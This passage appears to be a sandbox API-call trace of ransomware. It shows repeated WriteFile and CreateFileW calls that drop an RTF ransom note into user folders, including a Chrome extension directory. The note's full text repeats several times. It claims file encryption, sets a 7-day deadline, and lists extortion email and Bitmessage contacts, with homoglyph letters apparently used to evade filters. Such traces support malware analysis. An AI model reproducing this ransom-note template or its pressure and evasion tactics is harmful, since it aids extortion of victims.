\\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.635] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.638] CloseHandle (hObject=0x294) returned 1 [0297.638] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0297.638] GetLastError () returned 0x2 [0297.638] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 